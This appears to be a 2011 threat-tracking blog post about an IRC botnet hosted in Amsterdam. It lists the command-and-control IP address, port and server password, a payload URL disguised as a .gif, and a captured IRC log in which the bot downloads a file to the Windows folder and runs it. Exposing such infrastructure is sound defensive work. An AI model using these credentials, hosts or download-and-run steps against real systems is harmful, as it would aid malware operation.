46.21.169.42(irc botnet hosted in Netherlands Amsterdam Denkers Ict – Ipv4 Infrastructure)

By Pig, May 15, 2011

Remote Host Port Number
46.21.169.42 6567 PASS s1m0n3t4
70.38.98.239 80

* The data identified by the following URL was then requested from the remote web server:
o http://img105.herosh.com/2011/05/13/348778130.gif

MODE [SI|USA|00|P|75060] -ix
JOIN #mot# c1rc0dusoleil
PRIVMSG #mot# :[Dl]: File download: 80.0KB to: c:WINDOWSjds.exe @ 80.0KB/sec.
PRIVMSG #mot# :[Dl]: Created process: “c:WINDOWSjds.exe”, PID:
PONG Apple.Network
NICK [SI|USA|00|P|75060]
USER XP-9002 * 0 :COMPUTERNAME

UPDATE:
MODE [SI|USA|00|P|38552] -ix
JOIN #sav# c1rc0dusoleil
PONG Apple.Network
NICK [SI|USA|00|P|38552]
USER XP-4514 * 0 :COMPUTERNAME

infos about hosting:
http://whois.domaintools.com/46.21.169.42

Categories: Uncategorized

Previous postmecanto571.dyndns.org(irc botnet hosted in Germany Hetzner Online Ag)

Next post208.98.26.140(irc botnet hosted in United States Morgantown Sharktech Internet Services)